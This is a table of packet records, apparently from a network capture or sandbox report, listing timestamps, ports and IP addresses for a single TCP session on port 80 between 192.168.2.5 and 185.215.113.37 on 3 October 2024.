Oct 3, 2024 21:36:11.949430943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.949970961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949985027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.949999094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950017929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950026035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950037956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950047970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950057983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950071096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950079918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950092077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950103045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950115919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950126886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950138092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950155973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950161934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950170040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950182915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950201035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950213909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950881958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950896978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950911999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950922966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950934887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950942993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950954914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950963974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950977087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.950988054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.950999975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.951009035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.951023102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.951031923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.951045036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.951054096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.951067924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.951076984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.951090097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.951113939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.951127052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.995548964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.001241922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229640007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229665041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229680061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229695082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229705095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.229727983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229734898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.229748011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229759932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.229773045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229782104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.229805946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.229871035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229885101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229902983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.229918003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.229963064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229976892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.229995966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230003119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230010986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230029106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230041027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230055094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230068922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230078936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230092049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230101109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230128050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230735064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230748892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230762005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230773926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230786085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230794907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230808020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230822086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230830908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230844975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230859041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230869055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230881929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230900049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230907917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.230917931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.230947018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231460094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231472969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231487036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231498003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231509924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231518030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231530905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231539011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231554985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231560946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231575012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231585026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231594086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231605053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231622934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231628895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231637001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231651068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231659889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231676102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.231688023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.231709957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.232441902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232455015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232469082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232479095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.232494116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232507944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232522964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.232530117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232544899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232554913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.232567072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232580900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232589960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.232601881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232613087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.232625961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.232636929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.232664108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233187914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233201981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233217001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233227015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233239889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233247995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233261108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233269930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233282089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233290911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233304024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233313084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233325005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233335018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233350992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233356953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233370066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233381033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233388901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233401060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233416080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233426094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.233436108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.233458996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234137058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234152079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234165907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234175920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234189034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234198093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234210014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234220028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234234095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234242916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234252930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234265089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234277964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234291077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234303951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234322071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234328032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234342098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234352112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234360933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234373093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234392881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234399080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234410048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234426022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.234913111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.234954119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235044956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235059023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235073090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235086918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235096931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235110998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235119104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235131979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235146999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235157967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235173941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235181093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235193014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235203028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235215902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235227108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235238075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.235258102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235291004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.235985041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236001968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236016989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236032963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236041069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236054897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236068964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236078978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236098051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236114025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236121893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236141920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236149073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236160994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236171007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236185074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236193895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236208916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236232996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236248016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236906052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236920118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236934900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236943960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236958027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236964941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236975908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.236987114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.236998081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237010002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237020016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237030983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237042904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237054110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237066031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237076998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237088919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237099886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237109900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237123013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237133026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237148046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237155914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237181902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237699986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237714052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237739086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237752914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237770081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237783909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237797976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237806082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237819910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237829924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237843037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237852097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237860918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237873077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.237885952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.237911940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.317368031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.317434072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.317471981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.317487955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.317508936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.317523003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.317537069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.317552090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.317579985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.317682028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.317698002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.317729950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.317743063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318025112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318041086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318065882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318079948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318173885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318187952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318203926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318217039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318232059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318238020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318247080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318259954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318269968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318281889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318295956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318306923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318315983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318345070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318701029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318770885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318876982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318892002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318907022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318921089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.318933964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318933964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318944931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.318965912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.319068909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.319084883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.319104910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.319111109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.319123983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.319138050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.319154024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.319160938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.319160938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.319171906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.319194078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.319982052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.319997072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320012093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320024967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320035934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320046902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320059061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320071936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320086956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320099115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320107937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320118904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320128918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320138931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320152044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320161104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320173025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320183039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:12.320197105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:12.320205927 CEST	49704	80	192.168.2.5	185.215.113.37
